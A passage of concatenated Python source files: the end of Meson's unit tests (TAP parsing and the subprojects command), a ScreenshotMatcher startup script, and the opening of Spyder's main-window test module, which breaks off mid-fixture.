    def test_one_test_todo(self):
        # TODO directive: a failing test is an expected failure, a passing
        # one is an unexpected pass.
        events = self.parse_tap('not ok 1 abc # TODO')
        self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
        self.assert_last(events)

        events = self.parse_tap('ok 1 abc # TODO')
        self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
        self.assert_last(events)

    def test_one_test_skip(self):
        events = self.parse_tap('ok 1 abc # SKIP')
        self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
        self.assert_last(events)

    def test_one_test_skip_failure(self):
        # SKIP on a "not ok" line does not mask the failure.
        events = self.parse_tap('not ok 1 abc # SKIP')
        self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
        self.assert_last(events)

    def test_many_early_plan(self):
        events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
        self.assert_plan(events, num_tests=4, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_test(events, number=3, name='', result=TestResult.OK)
        self.assert_test(events, number=4, name='', result=TestResult.FAIL)
        self.assert_last(events)

    def test_many_late_plan(self):
        events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_test(events, number=3, name='', result=TestResult.OK)
        self.assert_test(events, number=4, name='', result=TestResult.FAIL)
        self.assert_plan(events, num_tests=4, late=True)
        self.assert_last(events)

    def test_directive_case(self):
        # Directives are matched case-insensitively.
        events = self.parse_tap('ok 1 abc # skip')
        self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
        self.assert_last(events)

        events = self.parse_tap('ok 1 abc # ToDo')
        self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
        self.assert_last(events)

    def test_directive_explanation(self):
        # Text after the directive keyword is reported as the explanation.
        events = self.parse_tap('ok 1 abc # skip why')
        self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
                         explanation='why')
        self.assert_last(events)

        events = self.parse_tap('ok 1 abc # ToDo Because')
        self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
                         explanation='Because')
        self.assert_last(events)

    def test_one_test_early_plan(self):
        events = self.parse_tap('1..1\nok')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

    def test_one_test_late_plan(self):
        events = self.parse_tap('ok\n1..1')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_plan(events, num_tests=1, late=True)
        self.assert_last(events)

    def test_out_of_order(self):
        # A test number that skips ahead is an error, but the test event is
        # still emitted.
        events = self.parse_tap('ok 2')
        self.assert_error(events)
        self.assert_test(events, number=2, name='', result=TestResult.OK)
        self.assert_last(events)

    def test_middle_plan(self):
        # A plan in the middle of the stream counts as late, and tests after
        # it are flagged as an error.
        events = self.parse_tap('ok 1\n1..2\nok 2')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_plan(events, num_tests=2, late=True)
        self.assert_error(events)
        self.assert_test(events, number=2, name='', result=TestResult.OK)
        self.assert_last(events)

    def test_too_many_plans(self):
        # Only one plan line is allowed; the second one is an error.
        events = self.parse_tap('1..1\n1..2\nok 1')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_error(events)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

    def test_too_many(self):
        # More tests than planned is an error, whether the plan is late or
        # early.
        events = self.parse_tap('ok 1\nnot ok 2\n1..1')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_plan(events, num_tests=1, late=True)
        self.assert_error(events)
        self.assert_last(events)

        events = self.parse_tap('1..1\nok 1\nnot ok 2')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_error(events)
        self.assert_last(events)

    def test_too_few(self):
        # Fewer tests than planned is an error as well.
        events = self.parse_tap('ok 1\nnot ok 2\n1..3')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_plan(events, num_tests=3, late=True)
        self.assert_error(events)
        self.assert_last(events)

        events = self.parse_tap('1..3\nok 1\nnot ok 2')
        self.assert_plan(events, num_tests=3, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_error(events)
        self.assert_last(events)

    def test_too_few_bailout(self):
        # "Bail out!" legitimately ends the stream early: no missing-test
        # error is reported.
        events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
        self.assert_plan(events, num_tests=3, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_bailout(events, message='no third test')
        self.assert_last(events)

    def test_diagnostics(self):
        # '#' diagnostic lines are ignored wherever they appear.
        events = self.parse_tap('1..1\n# ignored\nok 1')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

        events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

        events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_plan(events, num_tests=1, late=True)
        self.assert_last(events)

    def test_empty_line(self):
        events = self.parse_tap('1..1\n\nok 1')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

    def test_unexpected(self):
        # Unparseable lines produce an error event but parsing continues.
        events = self.parse_tap('1..1\ninvalid\nok 1')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_error(events)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

    def test_version(self):
        # Only TAP version 13 is accepted, and the version line must come
        # first.
        events = self.parse_tap('TAP version 13\n')
        self.assert_version(events, version=13)
        self.assert_last(events)

        events = self.parse_tap('TAP version 12\n')
        self.assert_error(events)
        self.assert_last(events)

        events = self.parse_tap('1..0\nTAP version 13\n')
        self.assert_plan(events, num_tests=0, late=False, skipped=True)
        self.assert_error(events)
        self.assert_last(events)

    def test_yaml(self):
        # YAML blocks attached to a test point must be terminated with '...'
        # (or implicitly by the next test line at the same indent level).
        events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.OK)
        self.assert_last(events)

        # Unterminated YAML at EOF is an error.
        events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_error(events)
        self.assert_last(events)

        # YAML cut short by an unindented test line is an error too.
        events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_error(events)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_last(events)


class SubprojectsCommandTests(BasePlatformTests):
    # Tests for the `meson subprojects` command (download / update / foreach),
    # driven against fake git "remote" repositories created under the build
    # dir.

    def setUp(self):
        super().setUp()
        self.root_dir = Path(self.builddir)

        self.project_dir = self.root_dir / 'src'
        self._create_project(self.project_dir)

        self.subprojects_dir = self.project_dir / 'subprojects'
        os.makedirs(str(self.subprojects_dir))

    def _create_project(self, path, project_name='dummy'):
        # Write a minimal meson.build so `path` is a valid meson project.
        os.makedirs(str(path), exist_ok=True)
        with open(str(path / 'meson.build'), 'w') as f:
            f.write("project('{}')".format(project_name))

    def _git(self, cmd, workdir):
        return git(cmd, str(workdir), check=True)[1].strip()

    def _git_config(self, workdir):
        self._git(['config', 'user.name', 'Meson Test'], workdir)
        self._git(['config', 'user.email', 'meson.test@example.com'], workdir)

    def _git_remote(self, cmd, name):
        # Run git in the fake "remote" repo living under root_dir.
        return self._git(cmd, self.root_dir / name)

    def _git_local(self, cmd, name):
        # Run git in the checked-out subproject under subprojects/.
        return self._git(cmd, self.subprojects_dir / name)

    def _git_local_branch(self, name):
        # Same as `git branch --show-current` but compatible with older git version
        branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name)
        # 'HEAD' means a detached HEAD; report that as an empty branch name.
        return branch if branch != 'HEAD' else ''

    def _git_local_commit(self, name, ref='HEAD'):
        return self._git_local(['rev-parse', ref], name)

    def _git_remote_commit(self, name, ref='HEAD'):
        return self._git_remote(['rev-parse', ref], name)

    def _git_create_repo(self, path):
        # If a user has git configuration init.defaultBranch set we want to override that
        with tempfile.TemporaryDirectory() as d:
            out = git(['--version'], str(d))[1]
        if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
            extra_cmd = ['--initial-branch', 'master']
        else:
            extra_cmd = []

        self._create_project(path)
        self._git(['init'] + extra_cmd, path)
        self._git_config(path)
        self._git(['add', '.'], path)
        self._git(['commit', '-m', 'Initial commit'], path)

    def _git_create_remote_repo(self, name):
        self._git_create_repo(self.root_dir / name)

    def _git_create_local_repo(self, name):
        self._git_create_repo(self.subprojects_dir / name)

    def _git_create_remote_commit(self, name, branch):
        self._git_remote(['checkout', branch], name)
        self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)

    def _git_create_remote_branch(self, name, branch):
        self._git_remote(['checkout', '-b', branch], name)
        self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)

    def _git_create_remote_tag(self, name, tag):
        self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name)
        self._git_remote(['tag', tag], name)

    def _wrap_create_git(self, name, revision='master'):
        # Write subprojects/<name>.wrap pointing at the fake remote repo.
        path = self.root_dir / name
        with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
            f.write(textwrap.dedent(
                '''
                [wrap-git]
                url={}
                revision={}
                '''.format(os.path.abspath(str(path)), revision)))

    def _wrap_create_file(self, name, tarball='dummy.tar.gz'):
        # Write a [wrap-file] style wrap; the tarball need not exist for the
        # tests that only classify wrap types.
        path = self.root_dir / tarball
        with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
            f.write(textwrap.dedent(
                '''
                [wrap-file]
                source_url={}
                '''.format(os.path.abspath(str(path)))))

    def _subprojects_cmd(self, args):
        return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir))

    def test_git_update(self):
        subp_name = 'sub1'

        # Create a fake remote git repository and a wrap file. Checks that
        # "meson subprojects download" works.
        self._git_create_remote_repo(subp_name)
        self._wrap_create_git(subp_name)
        self._subprojects_cmd(['download'])
        self.assertPathExists(str(self.subprojects_dir / subp_name))
        self._git_config(self.subprojects_dir / subp_name)

        # Create a new remote branch and update the wrap file. Checks that
        # "meson subprojects update --reset" checkout the new branch.
        self._git_create_remote_branch(subp_name, 'newbranch')
        self._wrap_create_git(subp_name, 'newbranch')
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))

        # Update remote newbranch. Checks the new commit is pulled into existing
        # local newbranch. Make sure it does not print spurious 'git stash' message.
        self._git_create_remote_commit(subp_name, 'newbranch')
        out = self._subprojects_cmd(['update', '--reset'])
        self.assertNotIn('No local changes to save', out)
        self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))

        # Update remote newbranch and switch to another branch. Checks that it
        # switch current branch to newbranch and pull latest commit.
        self._git_local(['checkout', 'master'], subp_name)
        self._git_create_remote_commit(subp_name, 'newbranch')
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))

        # Stage some local changes then update. Checks that local changes got
        # stashed.
        self._create_project(self.subprojects_dir / subp_name, 'new_project_name')
        self._git_local(['add', '.'], subp_name)
        self._git_create_remote_commit(subp_name, 'newbranch')
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
        self.assertTrue(self._git_local(['stash', 'list'], subp_name))

        # Create a new remote tag and update the wrap file. Checks that
        # "meson subprojects update --reset" checkout the new tag in detached mode.
        self._git_create_remote_tag(subp_name, 'newtag')
        self._wrap_create_git(subp_name, 'newtag')
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), '')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag'))

        # Create a new remote commit and update the wrap file with the commit id.
        # Checks that "meson subprojects update --reset" checkout the new commit
        # in detached mode.
        self._git_local(['checkout', 'master'], subp_name)
        self._git_create_remote_commit(subp_name, 'newbranch')
        new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name)
        self._wrap_create_git(subp_name, new_commit)
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), '')
        self.assertEqual(self._git_local_commit(subp_name), new_commit)

        # Create a local project not in a git repository, then update it with
        # a git wrap. Without --reset it should print error message and return
        # failure. With --reset it should delete existing project and clone the
        # new project.
        subp_name = 'sub2'
        self._create_project(self.subprojects_dir / subp_name)
        self._git_create_remote_repo(subp_name)
        self._wrap_create_git(subp_name)
        with self.assertRaises(subprocess.CalledProcessError) as cm:
            self._subprojects_cmd(['update'])
        self.assertIn('Not a git repository', cm.exception.output)
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name))

    @skipIfNoExecutable('true')
    def test_foreach(self):
        # One file-wrap subproject, one git-wrap, and one bare git checkout
        # without a wrap, to exercise the --types filter.
        self._create_project(self.subprojects_dir / 'sub_file')
        self._wrap_create_file('sub_file')
        self._git_create_local_repo('sub_git')
        self._wrap_create_git('sub_git')
        self._git_create_local_repo('sub_git_no_wrap')

        def ran_in(s):
            # Collect (sorted) the directories `meson subprojects foreach`
            # reports running the command in.
            ret = []
            prefix = 'Executing command in '
            for l in s.splitlines():
                if l.startswith(prefix):
                    ret.append(l[len(prefix):])
            return sorted(ret)

        dummy_cmd = ['true']
        out = self._subprojects_cmd(['foreach'] + dummy_cmd)
        self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap']))
        out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd)
        self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git']))
        out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd)
        self.assertEqual(ran_in(out), ['subprojects/sub_file'])
        out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd)
        self.assertEqual(ran_in(out), ['subprojects/sub_git'])


def _clang_at_least(compiler: 'Compiler', minver: str, apple_minver: T.Optional[str]) -> bool:
    """
    check that Clang compiler is at least a specified version, whether AppleClang or regular Clang

    Parameters
    ----------
    compiler:
        Meson compiler object
    minver: str
        Clang minimum version
    apple_minver: str
        AppleCLang minimum version

    Returns
    -------
    at_least: bool
        Clang is at least the specified version
    """
    if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
                             mesonbuild.compilers.AppleClangCPPCompiler)):
        # apple_minver=None means "no AppleClang release supports this".
        if apple_minver is None:
            return False
        return version_compare(compiler.version, apple_minver)
    return version_compare(compiler.version, minver)


def unset_envs():
    # For unit tests we must fully control all command lines
    # so that there are no unexpected changes coming from the
    # environment, for example when doing a package build.
    varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.CFLAGS_MAPPING.values())
    for v in varnames:
        if v in os.environ:
            del os.environ[v]


def convert_args(argv):
    # Convert unittest-style CLI args to the equivalent pytest args.
    # If we got passed a list of tests, pass it on
    pytest_args = ['-v'] if '-v' in argv else []
    test_list = []
    for arg in argv:
        if arg.startswith('-'):
            if arg in ('-f', '--failfast'):
                arg = '--exitfirst'
            pytest_args.append(arg)
            continue
        # ClassName.test_name => 'ClassName and test_name'
        if '.' in arg:
            arg = ' and '.join(arg.split('.'))
        test_list.append(arg)
    if test_list:
        # Selected tests become a single pytest -k expression.
        pytest_args += ['-k', ' or '.join(test_list)]
    return pytest_args


def running_single_tests(argv, cases):
    '''
    Check whether we only got arguments for running individual tests, not
    entire testcases, and not all testcases (no test args).
    '''
    got_test_arg = False
    for arg in argv:
        if arg.startswith('-'):
            continue
        for case in cases:
            if not arg.startswith(case):
                continue
            if '.' not in arg:
                # Got a testcase, done
                return False
            got_test_arg = True
    return got_test_arg


def main():
    # Entry point: prefer pytest (+xdist) when available, otherwise fall
    # back to plain unittest with the same list of testcases.
    unset_envs()
    cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
             'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
             'TAPParserTests', 'SubprojectsCommandTests',

             'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
             'WindowsTests', 'DarwinTests']

    try:
        import pytest # noqa: F401
        # Need pytest-xdist for `-n` arg
        import xdist # noqa: F401
        pytest_args = []
        # Don't use pytest-xdist when running single unit tests since it wastes
        # time spawning a lot of processes to distribute tests to in that case.
        if not running_single_tests(sys.argv, cases):
            pytest_args += ['-n', 'auto']
        pytest_args += ['./run_unittests.py']
        pytest_args += convert_args(sys.argv[1:])
        return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
    except ImportError:
        print('pytest-xdist not found, using unittest instead')
    # Fallback to plain unittest.
    return unittest.main(defaultTest=cases, buffer=True)

if __name__ == '__main__':
    print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
    start = time.monotonic()
    try:
        raise SystemExit(main())
    finally:
        print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
# ===== file: main.py =====
#!/usr/bin/python3
"""Entry point for the ScreenshotMatcher desktop server.

Starts the HTTP server and the UDP discovery service on background daemon
threads, then runs the GUI main loop on the main thread.  A PriorityQueue
is shared between the threads for cross-thread messages.
"""
import sys
import psutil
import threading
import ctypes
import queue

import server.server_discovery as discovery
from common.config import Config
from common.utility import read_user_config, get_current_ip_address
from matching.matcher import Matcher
from server.server import Server
from gui.app import App


def main():
    # Queue used for cross-thread communication. Only put (key, value)
    # tuples in there (it is a PriorityQueue, so items must be orderable).
    app_queue = queue.PriorityQueue()

    # Read user settings
    read_user_config()

    # Set the current host IP so the server binds/advertises the right address
    Config.HOST = get_current_ip_address()

    # Init server and run it on a daemon thread so it dies with the GUI
    server = Server(queue=app_queue)
    server_thread = threading.Thread(target=server.start, args=(), daemon=True)
    server_thread.start()

    # Start server discovery via UDP socket in another daemon thread
    udp_thread = threading.Thread(target=discovery.start, args=(), daemon=True)
    udp_thread.start()

    # Start the GUI (blocks until the window is closed)
    app = App(queue=app_queue)
    app.main_loop()


def _already_running():
    """Return True if another instance of this program is already running.

    Scans the process table for either a python interpreter running this
    script ('python.exe' — the check targets Windows) or a frozen
    'Screenshotmatcher.exe'.  Processes that vanish or deny access while
    being inspected are skipped instead of crashing the startup check.
    NOTE: this check causes issues with virtual environments.
    """
    matches = 0
    for proc in psutil.process_iter():
        try:
            name = proc.name()
            if 'Screenshotmatcher.exe' in name:
                matches += 1
            elif 'python.exe' in name and __file__ in proc.cmdline():
                matches += 1
        except (psutil.NoSuchProcess, psutil.AccessDenied,
                psutil.ZombieProcess):
            # Process ended or is not inspectable; it cannot be "us" anyway.
            continue
    # One match is this very process; more than one means a second instance.
    return matches > 1


if __name__ == "__main__":
    # Program already running? Abort with a message.
    if _already_running():
        # Frozen EXE: show a message box (winapi — Windows only, so guard it)
        if hasattr(ctypes, 'windll'):
            ctypes.windll.user32.MessageBoxW(
                0, "Screenshotmatcher.exe is already running.",
                "Screenshotmatcher.exe", 0)
        # Script run: also report on the console
        print("Screenshotmatcher.py is already running.")
        sys.exit(1)
    main()
# ===== file: test_mainwindow.py =====
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""

# Standard library imports
import os
import os.path as osp
import re
import shutil
import sys
import tempfile
from textwrap import dedent
from unittest.mock import Mock
import uuid

# Third party imports
from flaky import flaky
import ipykernel
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pkg_resources
from pkg_resources import parse_version
import pylint
import pytest
from qtpy import PYQT_VERSION
from qtpy.QtCore import Qt, QTimer
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage, QTextCursor
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit,
                            QTabBar, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE

# Local imports
from spyder import __trouble_url__
from spyder.api.utils import get_class_values
from spyder.api.widgets.auxiliary_widgets import SpyderWindowWidget
from spyder.api.plugins import Plugins
from spyder.app import start
from spyder.config.base import (
    get_home_dir, get_conf_path, get_module_path, running_in_ci)
from spyder.config.manager import CONF
from spyder.dependencies import DEPENDENCIES
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.plugins.layout.layouts import DefaultLayouts
from spyder.plugins.projects.api import EmptyProject
from spyder.py3compat import PY2, qbytearray_to_str, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import remove_backslashes
from spyder.utils.clipboard_helper import CLIPBOARD_HELPER
from spyder.widgets.dock import DockTitleBar


# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))

# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000

# Need longer EVAL_TIMEOUT, because need to cythonize and C compile ".pyx" file
# before import and eval it
COMPILE_AND_EVAL_TIMEOUT = 30000

# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000


# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
    """Open a file using the Editor and its open file dialog"""
    top_level_widgets = QApplication.topLevelWidgets()
    for w in top_level_widgets:
        if isinstance(w, QFileDialog):
            if directory is not None:
                w.setDirectory(directory)
            input_field = w.findChildren(QLineEdit)[0]
            input_field.setText(fname)
            QTest.keyClick(w, Qt.Key_Enter)


def reset_run_code(qtbot, shell, code_editor, nsb):
    """Reset state after a run code test"""
    qtbot.waitUntil(lambda: not shell._executing)
    with qtbot.waitSignal(shell.executed):
        shell.execute('%reset -f')
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
                    timeout=EVAL_TIMEOUT)
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)


def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
                     **kwargs):
    """Start a new kernel, and return its Manager and Client"""
    km = KernelManager(kernel_name=kernel_name)
    if spykernel:
        km._kernel_spec = SpyderKernelSpec()
    km.start_kernel(**kwargs)
    kc = km.client()
    kc.start_channels()
    try:
        kc.wait_for_ready(timeout=startup_timeout)
    except RuntimeError:
        # Tear down channels/kernel before re-raising so nothing leaks.
        kc.stop_channels()
        km.shutdown_kernel()
        raise
    return km, kc


def find_desired_tab_in_window(tab_name, window):
    # Returns (tabbar, index) for the first tab whose text matches, or
    # (None, None) when no tab with that name exists in the window.
    all_tabbars = window.findChildren(QTabBar)
    for current_tabbar in all_tabbars:
        for tab_index in range(current_tabbar.count()):
            if current_tabbar.tabText(tab_index) == str(tab_name):
                return current_tabbar, tab_index
    return None, None


def register_fake_entrypoints():
    """
    Create entry points distribution to register elements:

    * Completion providers (Fallback, Shippets, LSP)
    """
    # Completion providers
    fallback = pkg_resources.EntryPoint.parse(
        'fallback = spyder.plugins.completion.providers.fallback.provider:'
        'FallbackProvider'
    )

    snippets = pkg_resources.EntryPoint.parse(
        'snippets = spyder.plugins.completion.providers.snippets.provider:'
        'SnippetsProvider'
    )

    lsp = pkg_resources.EntryPoint.parse(
        'lsp = spyder.plugins.completion.providers.languageserver.provider:'
        'LanguageServerProvider'
    )

    # Create a fake Spyder distribution
    d = pkg_resources.Distribution(__file__)

    # Add the providers to the fake EntryPoints
    d._ep_map = {
        'spyder.completions': {
            'fallback': fallback,
            'snippets': snippets,
            'lsp': lsp
        }
    }

    # Add the fake distribution to the global working_set
    pkg_resources.working_set.add(d, 'spyder')


def remove_fake_entrypoints():
    """Remove fake entry points from pkg_resources"""
    try:
        pkg_resources.working_set.by_key.pop('unknown')
        pkg_resources.working_set.entry_keys.pop('spyder')
        pkg_resources.working_set.entry_keys.pop(__file__)
        pkg_resources.working_set.entries.remove('spyder')
    except KeyError:
        pass


def read_asset_file(filename):
    """Read contents of an asset file."""
    return encoding.read(osp.join(LOCATION, filename))[0]


# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request, tmpdir):
    """Main Window fixture"""
    if not running_in_ci():
        register_fake_entrypoints()

    # Tests assume inline backend
    CONF.set('ipython_console', 'pylab/backend', 0)

    # Test assume the plots are rendered in the console as png
    CONF.set('plots', 'mute_inline_plotting', False)
    CONF.set('ipython_console', 'pylab/inline/figure_format', 0)

    # Set exclamation mark to True
    CONF.set('ipython_console', 'pdb_use_exclamation_mark', True)

    # Check if we need to use introspection in a given test
    # (it's faster and less memory consuming not to use it!)
    use_introspection = request.node.get_closest_marker('use_introspection')

    if use_introspection:
        os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
    else:
        try:
            os.environ.pop('SPY_TEST_USE_INTROSPECTION')
        except KeyError:
            pass

    # Only use single_instance mode for tests that require it
    single_instance = request.node.get_closest_marker('single_instance')

    if single_instance:
        CONF.set('main', 'single_instance', True)
    else:
        CONF.set('main', 'single_instance', False)

    # Check if we need to load a simple project to the interface
    preload_project = request.node.get_closest_marker('preload_project')

    if preload_project:
        # Create project directory
        project = tmpdir.mkdir('test_project')
        project_path = str(project)

        # Create Spyder project
        spy_project = EmptyProject(project_path)
        CONF.set('project_explorer', 'current_project_path', project_path)

        # Add a file to the project
        file = project.join('file.py')
        file.write(read_asset_file('script_outline_1.py'))
        spy_project.set_recent_files([str(file)])
    else:
        CONF.set('project_explorer', 'current_project_path', None)

    # Check if we need to preload a complex project in a give test
    preload_complex_project = request.node.get_closest_marker(
        'preload_complex_project')

    if preload_complex_project:
        # Create project
        project = tmpdir.mkdir('test_project')
        project_subdir = project.mkdir('subdir')
        project_sub_subdir = project_subdir.mkdir('sub_subdir')

        # Create directories out of the project
        out_of_project_1 = tmpdir.mkdir('out_of_project_1')
        out_of_project_2 = tmpdir.mkdir('out_of_project_2')
        out_of_project_1_subdir = out_of_project_1.mkdir('subdir')
        out_of_project_2_subdir = out_of_project_2.mkdir('subdir')

        project_path = str(project)
        spy_project = EmptyProject(project_path)
        CONF.set('project_explorer', 'current_project_path', project_path)

        # Add some files to project. This is necessary to test that we get
        # symbols for all these files.
        abs_filenames = []
        filenames_to_create = {
            project: ['file1.py', 'file2.py', 'file3.txt', '__init__.py'],
            project_subdir: ['a.py', '__init__.py'],
            project_sub_subdir: ['b.py', '__init__.py'],
            out_of_project_1: ['c.py'],
            out_of_project_2: ['d.py', '__init__.py'],
            out_of_project_1_subdir: ['e.py', '__init__.py'],
            out_of_project_2_subdir: ['f.py']
        }

        for path in filenames_to_create.keys():
            filenames = filenames_to_create[path]
            for filename in filenames:
                file = path.join(filename)
                abs_filenames.append(str(file))
                if osp.splitext(filename)[1] == '.py':
                    if path == project_subdir:
                        code = read_asset_file('script_outline_2.py')
                    elif path == project_sub_subdir:
                        code = read_asset_file('script_outline_3.py')
                    else:
                        code = read_asset_file('script_outline_1.py')
                    file.write(code)
                else:
                    file.write("Hello world!")

        spy_project.set_recent_files(abs_filenames)
    else:
        if not preload_project:
            CONF.set('project_explorer', 'current_project_path', None)

    # Get config values passed in parametrize and apply them
    try:
        param = request.param
        if isinstance(param, dict) and 'spy_config' in param:
            CONF.set(*param['spy_config'])
    except AttributeError:
        pass

    # Reuse a single main window across tests: create it on first use,
    # otherwise clean up the previous test's state.
    if not hasattr(main_window, 'window'):
        from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
        PLUGIN_REGISTRY.reset()

        # Start the window
        window = start.main()
        main_window.window = window
    else:
        window = main_window.window

        # Close everything we can think of
        window.editor.close_file()
        window.projects.close_project()
        if window.console.error_dialog:
            window.console.close_error_dialog()
        window.switcher.close()
        for client in window.ipyconsole.get_clients():
            window.ipyconsole.close_client(client=client, ask_recursive=False)
        window.outlineexplorer.stop_symbol_services('python')
        # Reset cwd
        window.explorer.chdir(get_home_dir())

        spyder_boilerplate = window.get_plugin(
            'spyder_boilerplate', error=False)
        if spyder_boilerplate is not None:
            window.unregister_plugin(spyder_boilerplate)

    # Remove Kite (In case it was registered via setup.py)
